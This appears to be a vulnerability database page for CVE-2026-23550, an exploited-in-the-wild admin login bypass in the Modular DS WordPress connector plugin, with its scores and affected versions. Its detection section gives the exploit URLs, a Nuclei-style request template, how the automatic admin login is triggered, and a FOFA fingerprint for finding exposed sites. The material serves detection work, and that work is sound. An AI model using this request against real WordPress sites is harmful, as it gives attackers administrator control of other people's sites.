cbcvebase.
CVE-2026-23550
published 2026-01-14

CVE-2026-23550: Incorrect Privilege Assignment vulnerability in Modular DS Modular DS modular-connector allows Privilege Escalation.This issue affects Modular DS: from n/a…

PriorityP190critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
ITWEXPLOITVulnCheck KEVInitial access
Exploited in the wild
EPSS
20.63%
97.2th percentile
Incorrect Privilege Assignment vulnerability in Modular DS Modular DS modular-connector allows Privilege Escalation.This issue affects Modular DS: from n/a through <= 2.5.1.

Affected

1 ranges
VendorProductVersion rangeFixed in
modular_dsmodular_ds<= 2.5.1

Detection & IOCsextracted from sources · hover to see the quote

url{{BaseURL}}/index.php/api/modular-connector/login/{{string}}?origin=mo&type=foo
url{{BaseURL}}/api/modular-connector/login/{{string}}?origin=mo&type=foo
path/plugins/modular-connector/
cookiewordpress_logged_in
yara
id: CVE-2026-23550
info:
  name: Modular DS - Broken Access Control
  author: DhiyaneshDk
  severity: high
http:
- method: GET
  path:
  - "{{BaseURL}}/index.php/api/modular-connector/login/{{string}}?origin=mo&type=foo"
  - "{{BaseURL}}/api/modular-connector/login/{{string}}?origin=mo&type=foo"
  matchers:
  - type: dsl
    dsl:
    - status_code == 302
    - contains(header, "wordpress_logged_in")
    condition: and
  • Exploitation traffic targets the /api/modular-connector/login/ endpoint with query parameters origin=mo and type=foo; a successful exploit returns HTTP 302 with a Set-Cookie header containing 'wordpress_logged_in'.
  • First active exploitation was detected on January 13 around 02:00 UTC; monitor server access logs for requests to the /api/modular-connector/login/ route from that date onward.
  • After exploitation, check WordPress admin user list for rogue admin accounts added by unauthenticated attackers leveraging the automatic admin login fallback mechanism.
  • The exploit works by sending a request with 'direct request' mode activated and no user ID in the request body, causing the plugin to automatically fetch and log in as an existing admin or super admin user.
  • FOFA fingerprint for identifying exposed Modular DS instances: search for body containing '/plugins/modular-connector/'.
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.